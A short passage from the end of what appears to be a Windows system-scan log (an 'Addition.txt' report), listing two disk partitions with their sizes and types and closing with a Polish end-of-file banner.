(Size=32.1 GB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=116.8 GB) - (Type=OF Extended) ==================== Koniec Addition.txt ============================